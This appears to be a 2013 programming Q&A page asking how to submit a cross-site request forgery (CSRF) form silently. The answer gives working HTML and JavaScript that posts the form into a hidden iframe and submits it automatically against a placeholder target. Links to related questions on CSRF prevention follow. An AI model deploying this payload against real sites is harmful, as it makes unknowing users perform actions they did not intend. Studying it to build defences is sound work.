Example of silently submitting a POST FORM (CSRF)

security csrf
apscience picture apscience · Jul 30, 2013 · Viewed 35.4k times · Source

I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).

Example:

<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>

On an external site, what would I need to do to trigger this form automatically and silently?

Answer

Gumbo picture Gumbo · Jul 30, 2013

One solution would be to open the form’s action in a frame like an iframe:

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

Related questions

How to properly add cross-site request forgery (CSRF) token using PHP

I am trying to add some security to the forms on my website. One of the forms uses AJAX and the other is a straightforward "contact us" form. I'm trying to add a CSRF token. The problem I'm having is …

Read More
Why is it common to put CSRF prevention tokens in cookies?

I'm trying to understand the whole issue with CSRF and appropriate ways to prevent it. (Resources I've read, understand, and agree with: OWASP CSRF Prevention CHeat Sheet, Questions about CSRF.) As I understand it, the vulnerability around CSRF is introduced …

Read More
Cross Domain Form POSTing

I've seen articles and posts all over (including SO) on this topic, and the prevailing commentary is that same-origin policy prevents a form POST across domains. The only place I've seen someone suggest that same-origin policy does not apply to …

Read More